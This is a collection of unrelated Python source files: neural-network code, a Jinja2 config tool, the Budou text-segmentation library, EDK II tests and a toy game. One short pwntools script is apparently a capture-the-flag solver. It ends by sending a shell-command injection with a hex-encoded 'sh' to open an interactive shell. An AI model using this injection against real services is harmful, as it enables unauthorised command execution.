raise Exception("Network is already compiled. Changes are not allowed!")
if self.input_dims[input_id] != input_layer.get_size():
raise Exception("Input dimensions do not match!")
self.input_placeholder_layers.remove(self.input_layers[input_id])
self.input_layers[input_id].set_input_layer(input_layer)
def get_output_layer(self):
return self.output_layer
def get_input_placeholder_layers(self):
return self.input_placeholder_layers
def explore_layer_inputs(self, layer):
for input_layer in layer.get_input_layers():
if input_layer.get_id() is None:
self.explore_layer_inputs(input_layer)
layer.set_id(len(self.layers))
self.layers.append(layer)
self.connections.append([l.get_id() for l in layer.get_input_layers()])
def compile(self, output_layer, unconnected_layers=None):
if self.compiled:
raise Exception("Network is already compiled!")
self.output_layer = output_layer
self.output_dim = output_layer.get_size()
self.layers = []
# search network backwards from output to find all connected layers
self.explore_layer_inputs(output_layer)
if unconnected_layers:
for l in unconnected_layers:
self.explore_layer_inputs(l)
for input_layer in self.input_layers:
if input_layer.get_id() is None:
raise Exception("Output is unreachable from input " + input_layer.name + "!\nNetwork: " + str(self))
for layer in self.layers:
layer.compile(self)
self.parameters.extend(layer.get_parameters())
self.compiled = True
def is_compiled(self):
return self.compiled
def set_parameters(self, parameters):
if self.compiled:
raise Exception("Cannot change parameters of compiled network!")
expected_parameter_count = sum([l.get_parameter_count() for l in self.layers])
if len(parameters) != expected_parameter_count:
raise Exception(
"Expected " + str(expected_parameter_count) + " parameters, but got " + str(len(parameters)) + " instead!")
for layer in self.layers:
layer.set_parameters(parameters[0:layer.get_parameter_count()])
parameters = parameters[layer.get_parameter_count():]
def get_parameters(self):
return self.parameters
def copy(self, new_name, reuse_parameters=False):
if not self.compiled:
raise Exception("Cannot make a copy of uncompiled network!")
new_network = NeuralNetwork(new_name, self.session, self.input_dims)
for layer_id, layer in enumerate(self.layers):
is_input = False
for input_id, input_layer in enumerate(self.input_layers):
if layer == input_layer:
is_input = True
new_network.layers.append(new_network.input_layers[input_id])
break
if is_input:
continue
input_layers = [new_network.layers[i] for i in self.connections[layer_id]]
layer_copy = layer.copy(layer.name, input_layers)
new_network.layers.append(layer_copy)
if layer == self.output_layer:
new_network.output_layer = layer_copy
if reuse_parameters:
new_network.set_parameters(self.parameters)
return new_network
def predict_batch(self, inputs):
if not self.compiled:
raise Exception("Network must be compiled first!")
feed_dict = dict(zip([l.get_output() for l in self.input_placeholder_layers], inputs))
feed_dict[self.is_training] = False
return self.session.run(self.output_layer.get_output(), feed_dict=feed_dict)
def predict(self, inputs):
return self.predict_batch([[i] for i in inputs])[0]
def custom_fetch(self, inputs, fetch_layers):
feed_dict = dict(zip([l.get_output() for l in self.input_placeholder_layers], inputs))
feed_dict[self.is_training] = False
return self.session.run(fetch_layers, feed_dict=feed_dict)
def __str__(self):
network_str = ""
for layer in self.layers:
network_str += str([l.get_name() for l in layer.get_input_layers()]) + " --> " + layer.get_name() + "\n"
return network_str
class TargetNeuralNetwork(INeuralNetwork):
def __init__(self, name, source_network, approach_rate):
self.name = name
self.source_network = source_network
self.approach_rate = approach_rate
if not source_network.is_compiled():
raise Exception("Cannot create a target network from uncompiled source network!")
self.exponential_ma = tf.train.ExponentialMovingAverage(decay=approach_rate)
self.approach_parameters_op = self.exponential_ma.apply([par.tf_variable for par in source_network.get_parameters()])
self.target_parameters = [Parameter(self.exponential_ma.average(par.tf_variable), trainable=False) for par in source_network.get_parameters()]
self.target_network = source_network.copy(name)
self.target_network.set_parameters(self.target_parameters)
self.target_network.compile(self.target_network.get_output_layer())
self.session = self.source_network.session
self.input_dims = source_network.input_dims
self.is_training = self.target_network.is_training
def approach_source_parameters(self):
self.session.run(self.approach_parameters_op)
    def get_input_layer(self, input_id):
        return self.target_network.get_input_layer(input_id)
    def set_input_layer(self, input_id, input_layer):
        return self.target_network.set_input_layer(input_id, input_layer)
def get_output_layer(self):
return self.target_network.get_output_layer()
def get_input_placeholder_layers(self):
return self.target_network.get_input_placeholder_layers()
def compile(self, output):
return self.target_network.compile(output)
def is_compiled(self):
return self.target_network.is_compiled()
def set_parameters(self, parameters):
raise Exception("Changing parameters of a target network is not supported!")
def get_parameters(self):
return self.target_parameters
def copy(self, new_name, reuse_parameters=False):
return self.target_network.copy(new_name, reuse_parameters)
def predict_batch(self, inputs):
return self.target_network.predict_batch(inputs)
def predict(self, inputs):
return self.target_network.predict(inputs)
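# ---------------------------------------------------------------------------
# Hedged sketch (not part of the original module): TargetNeuralNetwork tracks
# the source parameters with tf.train.ExponentialMovingAverage. The guarded
# demo below shows that mechanism in isolation on a single TF1 variable; the
# variable name and the decay value are illustrative assumptions.
if __name__ == "__main__":
    import tensorflow as tf
    demo_session = tf.Session()
    source_var = tf.Variable(0.0, name="demo_source_var")
    ema = tf.train.ExponentialMovingAverage(decay=0.99)
    approach_op = ema.apply([source_var])      # same role as approach_parameters_op
    target_var = ema.average(source_var)       # shadow variable read by the target net
    demo_session.run(tf.global_variables_initializer())
    demo_session.run(source_var.assign(1.0))
    demo_session.run(approach_op)              # shadow moves (1 - decay) towards the source
    print(demo_session.run(target_var))        # roughly 0.01 with decay=0.99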
|
StarcoderdataPython
|
294133
|
<gh_stars>0
from pwn import *
# context.log_level = 'debug'
p = process('./main_exe')
p.send('\n') # start game
p.sendline('q') # quit game
p.sendline('TeamH4C') # input name
p.sendline('asdf') # input comment
p.sendline('H4C') # secret mode!!!
p.recv()
for repeat in range(5):
print p.recvuntil('(New Wave!)')
q = p.recv(2048).strip()
for f in ['<[', ']>', '=>> ((???))', '!']:
q = q.replace(f, '').strip()
print('question:', q)
num = []
oper = []
for idx, this in enumerate(q.split(' ')):
        if idx%2 != 0: # operator
oper.append(this)
else: # num
num.append(int(this))
print(num, oper)
ans = num[0]
for i in range(4):
if oper[i] in ('-', '/'):
ans += num[i+1]
elif oper[i] in ('+', '%'):
ans -= num[i+1]
else:
ans *= num[i+1]
print('answer:', ans)
p.sendline(str(ans))
print [p.recvline()]
log.success(str(repeat+1))
p.sendline(";$'\\x73\\x68'") # command injection
p.interactive()
|
StarcoderdataPython
|
8016583
|
# Rock-paper-scissors-lizard-Spock template
import random
# The key idea of this program is to equate the strings
# "rock", "paper", "scissors", "lizard", "Spock" to numbers
# as follows:
#
# 0 - rock
# 1 - Spock
# 2 - paper
# 3 - lizard
# 4 - scissors
# helper functions
def name_to_number(name):
# delete the following pass statement and fill in your code below
if(name == "Spock" or name=="spock" or name=="SPOCK"):
return 1
elif(name == "Rock" or name =="rock" or name=="ROCK"):
return 0
elif(name == "Paper" or name=="paper" or name=="PAPER"):
return 2
elif(name == "Lizard" or name=="lizard" or name == "LIZARD"):
return 3
elif(name=="Scissors" or name=="scissors" or name=="SCISSORS"):
return 4
else:
##-1 means invalid number
return -1
# convert name to number using if/elif/else
# don't forget to return the result!
def number_to_name(number):
# delete the following pass statement and fill in your code below
if(number == 0):
return "Rock"
elif(number == 1):
return "Spock"
elif(number == 2):
return "Paper"
elif(number == 3):
return "Lizard"
elif(number==4):
return "Scissors"
else:
return "Invalid number"
# convert number to a name using if/elif/else
# don't forget to return the result!
def rpsls(player_choice):
# delete the following pass statement and fill in your code below
# print a blank line to separate consecutive games
print ""
# print out the message for the player's choice
print "Player chooses: " + player_choice
# convert the player's choice to player_number using the function name_to_number()
player_number = name_to_number(player_choice)
#print player_number
# compute random guess for comp_number using random.randrange()
comp_number = random.randrange(0,5)
# convert comp_number to comp_choice using the function number_to_name()
comp_choice = number_to_name(comp_number)
# print out the message for computer's choice
print "Computer chooses: " + comp_choice
# compute difference of comp_number and player_number modulo five
difference = (comp_number - player_number) %5
#print difference
# use if/elif/else to determine winner, print winner message
if(difference == 1 or difference == 2):
print "Computer wins!"
elif(difference == 3 or difference ==4):
print "Player wins!"
else:
print "Tie game!"
# test your code - THESE CALLS MUST BE PRESENT IN YOUR SUBMITTED CODE
rpsls("rock")
rpsls("Spock")
rpsls("paper")
rpsls("lizard")
rpsls("scissors")
# always remember to check your completed program against the grading rubric
|
StarcoderdataPython
|
12846007
|
# -*- coding: utf-8 -*-
#
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Budou, an automatic CJK line break organizer."""
from __future__ import print_function
from .cachefactory import load_cache
import collections
from xml.etree import ElementTree as ET
import html5lib
import re
import six
import unicodedata
cache = load_cache()
class Chunk(object):
"""Chunk object. This represents a unit for word segmentation.
Attributes:
word: Surface word of the chunk. (str)
pos: Part of speech. (str)
label: Label information. (str)
dependency: Dependency to neighbor words. None for no dependency, True for
dependency to the following word, and False for the dependency to the
previous word. (bool or None)
"""
SPACE_POS = 'SPACE'
BREAK_POS = 'BREAK'
DEPENDENT_LABEL = (
'P', 'SNUM', 'PRT', 'AUX', 'SUFF', 'AUXPASS', 'RDROP', 'NUMBER', 'NUM',
'PREF')
def __init__(self, word, pos=None, label=None, dependency=None):
self.word = word
self.pos = pos
self.label = label
self.dependency = dependency
self._add_dependency_if_punct()
def __repr__(self):
return 'Chunk(%s, %s, %s, %s)' % (
repr(self.word), self.pos, self.label, self.dependency)
@classmethod
def space(cls):
"""Creates space Chunk."""
chunk = cls(u' ', cls.SPACE_POS)
return chunk
@classmethod
def breakline(cls):
"""Creates breakline Chunk."""
chunk = cls(u'\n', cls.BREAK_POS)
return chunk
def is_space(self):
"""Checks if this is space Chunk."""
return self.pos == self.SPACE_POS
def has_cjk(self):
"""Checks if the word of the chunk contains CJK characters
Using range from
https://github.com/nltk/nltk/blob/develop/nltk/tokenize/util.py#L149
"""
for char in self.word:
if any([start <= ord(char) <= end for start, end in
[(4352, 4607), (11904, 42191), (43072, 43135), (44032, 55215),
(63744, 64255), (65072, 65103), (65381, 65500),
(131072, 196607)]
]):
return True
return False
def update_word(self, word):
"""Updates the word of the chunk."""
self.word = word
def serialize(self):
"""Returns serialized chunk data in dictionary."""
return {
'word': self.word,
'pos': self.pos,
'label': self.label,
'dependency': self.dependency,
'has_cjk': self.has_cjk(),
}
def maybe_add_dependency(self, default_dependency_direction):
"""Adds dependency if any dependency is not assigned yet."""
if self.dependency is None and self.label in self.DEPENDENT_LABEL:
self.dependency = default_dependency_direction
def _add_dependency_if_punct(self):
"""Adds dependency if the chunk is punctuation."""
if self.pos == 'PUNCT':
try:
# Getting unicode category to determine the direction.
# Concatenates to the following if it belongs to Ps or Pi category.
# Ps: Punctuation, open (e.g. opening bracket characters)
# Pi: Punctuation, initial quote (e.g. opening quotation mark)
# Otherwise, concatenates to the previous word.
# See also https://en.wikipedia.org/wiki/Unicode_character_property
category = unicodedata.category(self.word)
self.dependency = category in ('Ps', 'Pi')
except:
pass
class ChunkList(list):
"""Chunk list. """
def get_overlaps(self, offset, length):
"""Returns chunks overlapped with the given range.
Args:
offset: Begin offset of the range. (int)
length: Length of the range. (int)
Returns:
Overlapped chunks. (list of Chunk)
"""
# In case entity's offset points to a space just before the entity.
if ''.join([chunk.word for chunk in self])[offset] == ' ':
offset += 1
index = 0
result = []
for chunk in self:
if offset < index + len(chunk.word) and index < offset + length:
result.append(chunk)
index += len(chunk.word)
return result
def swap(self, old_chunks, new_chunk):
"""Swaps old consecutive chunks with new chunk.
Args:
old_chunks: List of consecutive Chunks to be removed. (list of Chunk)
new_chunk: A Chunk to be inserted. (Chunk)
"""
indexes = [self.index(chunk) for chunk in old_chunks]
del self[indexes[0]:indexes[-1] + 1]
self.insert(indexes[0], new_chunk)
class Budou(object):
"""A parser for CJK line break organizer.
Attributes:
service: A Resource object with methods for interacting with the service.
(googleapiclient.discovery.Resource)
"""
DEFAULT_CLASS_NAME = 'ww'
def __init__(self, service):
self.service = service
@classmethod
def authenticate(cls, json_path=None):
"""Authenticates for Cloud Natural Language API and returns a parser.
If a service account private key file is not given, it tries to authenticate
with default credentials.
Args:
json_path: A file path to a service account's JSON private keyfile.
(str, optional)
Returns:
Budou parser. (Budou)
"""
import google_auth_httplib2
from googleapiclient import discovery
scope = ['https://www.googleapis.com/auth/cloud-platform']
if json_path:
try:
from google.oauth2 import service_account
credentials = service_account.Credentials.from_service_account_file(
json_path)
scoped_credentials = credentials.with_scopes(scope)
except ImportError:
print('''Failed to load google.oauth2.service_account module.
If you are running this script in Google App Engine environment,
please call `authenticate` method with empty argument to
authenticate with default credentials.''')
else:
import google.auth
scoped_credentials, project = google.auth.default(scope)
authed_http = google_auth_httplib2.AuthorizedHttp(scoped_credentials)
service = discovery.build('language', 'v1beta2', http=authed_http)
return cls(service)
def parse(self, source, attributes=None, use_cache=True, language=None,
max_length=None, use_entity=False, classname=None):
"""Parses input HTML code into word chunks and organized code.
Args:
source: Text to be processed. (str)
attributes: A key-value mapping for attributes of output elements.
(dictionary, optional)
**This argument used to accept a string or a list of strings to
specify class names of the output chunks, but this designation method
is now deprecated. Please use a dictionary to designate attributes.**
use_cache: Whether to use caching. (bool, optional)
language: A language used to parse text. (str, optional)
max_length: Maximum length of span enclosed chunk. (int, optional)
use_entity: Whether to use entities Entity Analysis results. Note that it
makes additional request to API, which may incur additional cost.
(bool, optional)
classname: A class name of output elements. (str, optional)
**This argument is deprecated. Please use attributes argument
instead.**
Returns:
A dictionary with the list of word chunks and organized HTML code.
For example:
{
'chunks': [
{'dependency': None, 'label': 'NSUBJ', 'pos': 'NOUN', 'word': '今日も'},
{'dependency': None, 'label': 'ROOT', 'pos': 'VERB', 'word': '食べる'}
],
'html_code': '<span class="ww">今日も</span><span class="ww">食べる</span>'
}
"""
if use_cache:
result_value = cache.get(source, language)
if result_value: return result_value
input_text = self._preprocess(source)
if language == 'ko':
# Korean has spaces between words, so this simply parses words by space
# and wrap them as chunks.
chunks = self._get_chunks_per_space(input_text)
else:
chunks, tokens, language = self._get_chunks_with_api(
input_text, language, use_entity)
attributes = self._get_attribute_dict(attributes, classname)
html_code = self._html_serialize(chunks, attributes, max_length)
result_value = {
'chunks': [chunk.serialize() for chunk in chunks],
'html_code': html_code,
'language': language,
'tokens': tokens,
}
if use_cache:
cache.set(source, language, result_value)
return result_value
def _get_chunks_per_space(self, input_text):
"""Returns a chunk list by separating words by spaces.
Args:
input_text: String to parse. (str)
Returns:
A chunk list. (ChunkList)
"""
chunks = ChunkList()
words = input_text.split()
for i, word in enumerate(words):
chunks.append(Chunk(word))
if i < len(words) - 1: # Add no space after the last word.
chunks.append(Chunk.space())
return chunks
def _get_chunks_with_api(self, input_text, language=None, use_entity=False):
"""Returns a chunk list by using Google Cloud Natural Language API.
Args:
input_text: String to parse. (str)
language: A language code. 'ja' and 'ko' are supported. (str, optional)
use_entity: Whether to use entities in Natural Language API response.
(bool, optional)
Returns:
A chunk list. (ChunkList)
"""
chunks, tokens, language = self._get_source_chunks(input_text, language)
if use_entity:
entities = self._get_entities(input_text, language)
chunks = self._group_chunks_by_entities(chunks, entities)
chunks = self._resolve_dependency(chunks)
chunks = self._insert_breakline(chunks)
return chunks, tokens, language
def _get_attribute_dict(self, attributes, classname=None):
"""Returns a dictionary of HTML element attributes.
Args:
attributes: If a dictionary, it should be a map of name-value pairs for
attributes of output elements. If a string, it should be a class name of
output elements. (dict or str)
classname: Optional class name. (str, optional)
Returns:
An attribute dictionary. (dict of (str, str))
"""
if attributes and isinstance(attributes, six.string_types):
return {
'class': attributes
}
if not attributes:
attributes = {}
if not classname:
classname = self.DEFAULT_CLASS_NAME
attributes.setdefault('class', classname)
return attributes
def _preprocess(self, source):
"""Removes unnecessary break lines and white spaces.
Args:
source: HTML code to be processed. (str)
Returns:
Preprocessed HTML code. (str)
"""
doc = html5lib.parseFragment(source)
source = ET.tostring(doc, encoding='utf-8', method='text').decode('utf-8')
source = source.replace(u'\n', u'').strip()
source = re.sub(r'\s\s+', u' ', source)
return source
def _get_source_chunks(self, input_text, language=None):
"""Returns a chunk list retrieved from Syntax Analysis results.
Args:
input_text: Text to annotate. (str)
language: Language of the text. 'ja' and 'ko' are supported.
(str, optional)
Returns:
A chunk list. (ChunkList)
"""
chunks = ChunkList()
sentence_length = 0
tokens, language = self._get_annotations(input_text, language)
for i, token in enumerate(tokens):
word = token['text']['content']
begin_offset = token['text']['beginOffset']
label = token['dependencyEdge']['label']
pos = token['partOfSpeech']['tag']
if begin_offset > sentence_length:
chunks.append(Chunk.space())
sentence_length = begin_offset
chunk = Chunk(word, pos, label)
# Determining default concatenating direction based on syntax dependency.
chunk.maybe_add_dependency(
i < token['dependencyEdge']['headTokenIndex'])
chunks.append(chunk)
sentence_length += len(word)
return chunks, tokens, language
def _group_chunks_by_entities(self, chunks, entities):
"""Groups chunks by entities retrieved from NL API Entity Analysis.
Args:
chunks: The list of chunks to be processed. (ChunkList)
entities: List of entities. (list of dict)
Returns:
A chunk list. (ChunkList)
"""
for entity in entities:
chunks_to_concat = chunks.get_overlaps(
entity['beginOffset'], len(entity['content']))
if not chunks_to_concat: continue
new_chunk_word = u''.join([chunk.word for chunk in chunks_to_concat])
new_chunk = Chunk(new_chunk_word)
chunks.swap(chunks_to_concat, new_chunk)
return chunks
def _html_serialize(self, chunks, attributes, max_length):
"""Returns concatenated HTML code with SPAN tag.
Args:
chunks: The list of chunks to be processed. (ChunkList)
attributes: If a dictionary, it should be a map of name-value pairs for
attributes of output SPAN tags. If a string, it should be a class name
of output SPAN tags. If an array, it should be a list of class names
of output SPAN tags. (str or dict or list of str)
max_length: Maximum length of span enclosed chunk. (int, optional)
Returns:
The organized HTML code. (str)
"""
doc = ET.Element('span')
for chunk in chunks:
if chunk.is_space():
if doc.getchildren():
if doc.getchildren()[-1].tail is None:
doc.getchildren()[-1].tail = ' '
else:
doc.getchildren()[-1].tail += ' '
else:
if doc.text is not None:
# We want to preserve space in cases like "Hello 你好"
# But the space in " 你好" can be discarded.
doc.text += ' '
else:
if chunk.has_cjk() and not (max_length and len(chunk.word) > max_length):
ele = ET.Element('span')
ele.text = chunk.word
for k, v in attributes.items():
ele.attrib[k] = v
doc.append(ele)
else:
# add word without span tag for non-CJK text (e.g. English)
# by appending it after the last element
if doc.getchildren():
if doc.getchildren()[-1].tail is None:
doc.getchildren()[-1].tail = chunk.word
else:
doc.getchildren()[-1].tail += chunk.word
else:
if doc.text is None:
doc.text = chunk.word
else:
doc.text += chunk.word
result = ET.tostring(doc, encoding='utf-8').decode('utf-8')
result = html5lib.serialize(
html5lib.parseFragment(result), sanitize=True,
quote_attr_values="always")
return result
def _resolve_dependency(self, chunks):
"""Resolves chunk dependency by concatenating them.
Args:
      chunks: a chunk list. (ChunkList)
Returns:
A chunk list. (ChunkList)
"""
chunks = self._concatenate_inner(chunks, True)
chunks = self._concatenate_inner(chunks, False)
return chunks
def _concatenate_inner(self, chunks, direction):
"""Concatenates chunks based on each chunk's dependency.
Args:
      chunks: a chunk list. (ChunkList)
      direction: Direction of concatenation process. True for forward. (bool)
Returns:
A chunk list. (ChunkList)
"""
tmp_bucket = []
source_chunks = chunks if direction else chunks[::-1]
target_chunks = ChunkList()
for chunk in source_chunks:
if (
# if the chunk has matched dependency, do concatenation.
chunk.dependency == direction or
# if the chunk is SPACE, concatenate to the previous chunk.
(direction == False and chunk.is_space())
):
tmp_bucket.append(chunk)
continue
tmp_bucket.append(chunk)
if not direction: tmp_bucket = tmp_bucket[::-1]
new_word = ''.join([tmp_chunk.word for tmp_chunk in tmp_bucket])
chunk.update_word(new_word)
target_chunks.append(chunk)
tmp_bucket = []
if tmp_bucket: target_chunks += tmp_bucket
return target_chunks if direction else target_chunks[::-1]
def _insert_breakline(self, chunks):
"""Inserts a breakline instead of a trailing space if the chunk is in CJK.
Args:
chunks: a chunk list. (ChunkList)
Returns:
A chunk list. (ChunkList)
"""
target_chunks = ChunkList()
for chunk in chunks:
if chunk.word[-1] == ' ' and chunk.has_cjk():
chunk_to_add = Chunk(
chunk.word[:-1], chunk.pos, chunk.label, chunk.dependency)
target_chunks.append(chunk_to_add)
target_chunks.append(chunk.breakline())
else:
target_chunks.append(chunk)
return target_chunks
def _get_annotations(self, text, language='', encoding='UTF32'):
"""Returns the list of annotations from the given text."""
body = {
'document': {
'type': 'PLAIN_TEXT',
'content': text,
},
'features': {
'extract_syntax': True,
},
'encodingType': encoding,
}
if language:
body['document']['language'] = language
request = self.service.documents().annotateText(body=body)
response = request.execute()
tokens = response.get('tokens', [])
language = response.get('language')
return tokens, language
def _get_entities(self, text, language='', encoding='UTF32'):
"""Returns the list of annotations from the given text."""
body = {
'document': {
'type': 'PLAIN_TEXT',
'content': text,
},
'encodingType': encoding,
}
if language:
body['document']['language'] = language
request = self.service.documents().analyzeEntities(body=body)
response = request.execute()
result = []
for entity in response.get('entities', []):
mentions = entity.get('mentions', [])
if not mentions: continue
entity_text = mentions[0]['text']
offset = entity_text['beginOffset']
for word in entity_text['content'].split():
result.append({'content': word, 'beginOffset': offset})
offset += len(word)
return result
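# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module): Chunk and ChunkList
# can be exercised without the Cloud Natural Language API. The sample text and
# offsets below are illustrative assumptions.
if __name__ == '__main__':
    demo_chunks = ChunkList([Chunk(u'今日'), Chunk(u'は'), Chunk.space(), Chunk(u'good')])
    overlapped = demo_chunks.get_overlaps(0, 3)         # chunks covering offsets [0, 3)
    merged = Chunk(u''.join(c.word for c in overlapped))
    demo_chunks.swap(overlapped, merged)                # replace them with a single chunk
    print([c.word for c in demo_chunks])                # three chunks remain after the merge
    print(merged.has_cjk())                             # True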
|
StarcoderdataPython
|
1788144
|
from googletrans import Translator
import couchdb
import os,json
import time
# couchdb_address = 'http://openwhisk:[email protected]:5984/'
# db = couchdb.Server(couchdb_address)
translator = Translator()
# def active_storage(avtive_type, user_object,document_id,filename,file_path=None,content_type=None, save_path=None):
# if avtive_type == 'PUT':
# content = open(file_path, 'rb')
# user_object.put_attachment(user_object[document_id], content.read(), filename = filename, content_type = content_type)
# content.close()
# elif avtive_type == 'GET':
# r = user_object.get_attachment(document_id,filename = filename)
# with open(save_path,'wb') as f: f.write(r.read())
# def get_fileNameExt(filename):
# (shortname, extension) = os.path.splitext(filename)
# return shortname, extension
def main():
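    # NOTE: `store` is not defined or imported in this module; it is presumably
    # injected by the serverless runtime this function is deployed to (an
    # assumption based on the commented-out CouchDB variant below).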
extracted_text = store.fetch(['extracted_text'])['extracted_text']
# translated_text = translator.translate(extracted_text, dest='en').text # can't connect to google...
translated_text = extracted_text
time.sleep(1)
store.put({'translated_text': translated_text}, {})
# evt = json.loads(event)
# user_name = evt['user_name']
# document_id = evt['document_id']
# extracted_text_filename = evt['extracted_text_filename']
# user_object = db[user_name]
# input_path = os.path.join('..',user_name,document_id)
# input_filepath = os.path.join(input_path,extracted_text_filename)
# if os.path.exists(input_filepath):os.remove(input_filepath)
# else: os.makedirs(input_path)
# active_storage('GET', user_object,document_id,extracted_text_filename,save_path = input_filepath)
# shortname, extension = get_fileNameExt(extracted_text_filename)
# extract_text_path = os.path.join(input_path,'translated_{}.txt'.format(shortname))
# if os.path.exists(extract_text_path):os.remove(extract_text_path)
# with open(input_filepath,"r") as f:
# text_content = f.read()
# result = translator.translate(text_content, dest='en')
# with open(extract_text_path,'w', encoding='utf-8') as f:
# f.write(result.text)
# active_storage('PUT', user_object,document_id,extracted_text_filename,extract_text_path,'application/octet')
# main('{"user_name":"user_2","document_id":"object_id_1","extracted_text_filename":"extract_test.txt"}')
|
StarcoderdataPython
|
5167045
|
<filename>j2p.py
#!/usr/bin/env python3
__author__ = '<NAME>'
from modules.j2ASTwalker import J2Meta
from modules import tools, delivery
import sys
import yaml
import os
import argparse
class ArgParser:
def __init__(self, args=False): # arguments should be passed by unit test only
parser = argparse.ArgumentParser(description='\
Jinja2 Parser: YAML-builder and lightweight config generator.', epilog='Thank you for using help!')
parser.add_argument('filename', help='Filename.')
parser.add_argument('file_type', help='Jinja2 or YAML file.',
choices=['j2', 'yaml'])
subparsers = parser.add_subparsers(help='Select delivery mode, YAML only.', dest='mode')
save_parser = subparsers.add_parser('save', help='Save generated configs in a directory specified in settings.')
save_parser.add_argument('-p', '--prefix', help='Config filename prefix.', dest='prefix', default=False)
if args: # if arguments are passed from unittest
self.args = parser.parse_args(args)
else:
self.args = parser.parse_args()
def prefix(self):
if self.args.mode == 'save':
return self.args.prefix
else:
return False
def mode(self):
return self.args.mode
def file_type(self):
return self.args.file_type
def filename(self):
return self.args.filename
class ScriptEnvironment:
def __init__(self, cli_args, settings_file='./settings.yaml'):
self.script_realpath = os.path.realpath(__file__)
self.script_dirname = os.path.dirname(self.script_realpath)
try:
# load parameters from settings file
settings = tools.load_yaml(os.path.realpath(settings_file))
self.template_path = self.get_dir(settings['template_path'])
self.configs_path = self.get_dir(settings['configs'])
self.task_path = self.get_dir(settings['task_path'])
db_name = self.get_file(self.script_realpath, settings['host_db'])
self.json_db = tools.load_yaml(db_name)
if not isinstance(self.json_db, dict):
sys.exit('ERROR: Wrong db format. Database file should be a dictionary!')
# get parameters from CLI
self.file_type = cli_args.file_type()
if self.file_type == "yaml":
self.filename = self.get_file(self.task_path, cli_args.filename())
self.json_data = tools.load_yaml(self.filename)
self.mode = cli_args.mode()
if self.mode == 'save':
self.prefix = cli_args.prefix()
else:
self.filename = self.get_file(self.template_path, cli_args.filename())
        except Exception as err:
            sys.exit('ERROR: Can not load settings! ({})'.format(err))
def get_dir(self, dir_name):
if os.path.isdir(dir_name):
return dir_name
else:
template_dir = os.path.join(self.script_realpath, dir_name)
if os.path.isdir(template_dir):
return template_dir
else:
sys.exit('ERROR: Can not find directory %s!' % dir_name)
def get_file(self, dir, file_name):
if os.path.isfile(file_name):
return file_name
else:
file = os.path.join(dir, file_name)
if os.path.isfile(file):
return file
else:
sys.exit('ERROR: Can not find file %s!' % file_name)
if __name__ == '__main__':
# define script environment
cli_args = ArgParser()
env = ScriptEnvironment(cli_args)
# delivery.run(env)
if env.file_type == 'j2':
template_meta = J2Meta(env.filename)
print(
yaml.dump(template_meta.get_variables(), default_flow_style=False)
)
if env.file_type == 'yaml':
if env.mode == 'save':
delivery.save_configs(env)
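# Example invocations (illustrative; the template and task file names are assumptions):
#   ./j2p.py router.j2 j2                  # print the variables a template expects, as YAML
#   ./j2p.py task.yaml yaml save -p lab_   # render configs and save them with a filename prefix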
|
StarcoderdataPython
|
11362527
|
# @file dsc_test.py
# Tests for the data model for the EDK II DSC
#
# Copyright (c) Microsoft Corporation
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
##
import unittest
from edk2toollib.uefi.edk2.build_objects.dsc import dsc
from edk2toollib.uefi.edk2.build_objects.dsc import library_class
from edk2toollib.uefi.edk2.build_objects.dsc import component
from edk2toollib.uefi.edk2.build_objects.dsc import definition
from edk2toollib.uefi.edk2.build_objects.dsc import dsc_buildoption_section_type
from edk2toollib.uefi.edk2.build_objects.dsc import dsc_pcd_section_type
from edk2toollib.uefi.edk2.build_objects.dsc import dsc_section_type
class TestDscObject(unittest.TestCase):
def test_null_creation(self):
d = dsc()
self.assertNotEqual(d, None)
    def test_dsc_multiple_defines(self):
# When we add an object, it should overwrite the previous one
d = TestDscObject.create_dsc_object()
d.defines.add(definition("PLATFORM_NAME", "TEST2"))
for define in d.defines:
if define.name == "PLATFORM_NAME": # check to make sure it matches
self.assertEqual(define.value, "TEST2")
    def test_dsc_multiple_library_classes(self):
d = dsc()
# When we add an object, it should overwrite the previous one
common_section = dsc_section_type()
d.library_classes[common_section].add(library_class("TEST", "BOB.inf"))
self.assertEqual(len(d.library_classes[common_section]), 1)
# we should override the previous one
d.library_classes[common_section].add(library_class("TEST", "BOB2.inf"))
self.assertEqual(len(d.library_classes[common_section]), 1)
for lib in d.library_classes[common_section]:
self.assertEqual(lib.inf, "BOB2.inf") # make sure we overrode it
self.assertEqual(len(d.library_classes[common_section]), 1)
# make sure we can add a library to a different section and that
IA32_section = dsc_section_type(arch="IA32")
self.assertEqual(len(d.library_classes[IA32_section]), 0)
d.library_classes[IA32_section].add(library_class("NULL", "BOB1.inf"))
self.assertEqual(len(d.library_classes[IA32_section]), 1)
d.library_classes[IA32_section].add(library_class("NULL", "BOB2.inf"))
self.assertEqual(len(d.library_classes[IA32_section]), 2)
def test_get_library_classes(self):
        ''' This serves more as an example of how to walk the DSC to get a library class for a component '''
        pass
def test_put_in_bad_things(self):
d = dsc()
# make sure we can't add stuff to d.defines
with self.assertRaises(ValueError):
d.defines.add(library_class("NULL", "TEST.inf"))
# make sure we can't add stuff to skus
with self.assertRaises(ValueError):
d.skus.add(library_class("TEST", "TEST.inf"))
# make sure we can't add stuff to skus
with self.assertRaises(ValueError):
d.default_stores.add(component("TEST", "TEST.inf"))
common_section = dsc_section_type()
build_opt_section = dsc_buildoption_section_type()
pcd_section = dsc_pcd_section_type("FEATUREFLAG")
# now to check the build options
d.build_options[build_opt_section] = set()
with self.assertRaises(ValueError):
d.build_options[pcd_section] = set()
with self.assertRaises(ValueError):
d.build_options[common_section] = set()
with self.assertRaises(ValueError):
d.build_options[build_opt_section].add(library_class("TEST", "TEST.inf"))
        # NEXTVER: once the adding logic is implemented, this will need to be redone
with self.assertRaises(ValueError):
d.build_options[build_opt_section] = set()
# now to check the pcds
d.pcds[pcd_section] = set()
with self.assertRaises(ValueError):
d.pcds[build_opt_section] = set()
with self.assertRaises(ValueError):
d.pcds[pcd_section].add(library_class("TEST", "TEST.inf"))
        # NEXTVER: once the adding logic is implemented, this will need to be redone
with self.assertRaises(ValueError):
d.pcds[pcd_section] = set()
# now to check the library classes
d.library_classes[common_section] = set()
with self.assertRaises(ValueError):
d.library_classes[build_opt_section] = set()
with self.assertRaises(ValueError):
